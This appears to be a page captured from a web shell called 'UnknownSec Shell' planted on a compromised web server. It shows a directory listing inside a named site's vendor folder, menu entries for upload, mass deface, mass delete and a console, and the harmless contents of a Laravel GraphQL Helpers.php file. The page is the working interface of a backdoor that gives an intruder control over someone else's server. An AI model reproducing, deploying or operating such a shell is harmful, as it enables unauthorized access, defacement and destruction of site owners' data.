shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
rebing
/
graphql-laravel
/
src
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Helpers.php
<?php declare(strict_types = 1); namespace Rebing\GraphQL; use Closure; class Helpers { /** * Originally from \Nuwave\Lighthouse\Support\Utils::applyEach * * Apply a callback to a value or each value in an array. * * @param mixed|list<mixed> $valueOrValues * @return mixed|list<mixed> */ public static function applyEach(Closure $callback, $valueOrValues) { if (\is_array($valueOrValues)) { return array_map($callback, $valueOrValues); } return $callback($valueOrValues); } }
© 2026 UnknownSec